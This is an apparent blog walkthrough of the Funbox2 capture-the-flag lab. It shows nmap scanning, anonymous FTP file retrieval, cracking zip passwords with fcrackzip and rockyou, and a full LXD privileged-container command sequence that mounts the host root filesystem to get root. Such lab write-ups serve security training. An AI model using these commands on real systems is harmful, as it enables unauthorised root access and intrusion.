Funbox2 Walkthrough

Scanning the host with nmap -A -T4 -p- 192.168.1.13 -vv

As we can see port 21 ftp got some files we can download as it accepts to login with anonymous login:

We use the command “mget *.*” to download all the files:

We got some password protected files I’m going to brute force them with “fcrackzip -u -D -p /root/pass/rockyou.txt” :

The Tom ssh worked but not Catherine user:

Now Tom is part of LXD group so we can escalate to root from there:

We start by writing “lxd init” and then accepte all as default:

Then using the tool lxd-alpine-builder on out machine:

./build-alpine

./build-alpine -h

And then transfer the file it created to the target machine and then enter these commands:

lxc image import ./ alpine-v3.12-x86_64-20200923_2222.tar.gz –alias image

lxc image list

lxc init image hacker -c security.privileged=true

lxc config device add hacker mydevice disk source=/ path=/mnt/root recursive=true

lxc start hacker

lxc exec hacker /bin/sh

 Then we navigate to /mnt/root/root and catch the flag

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s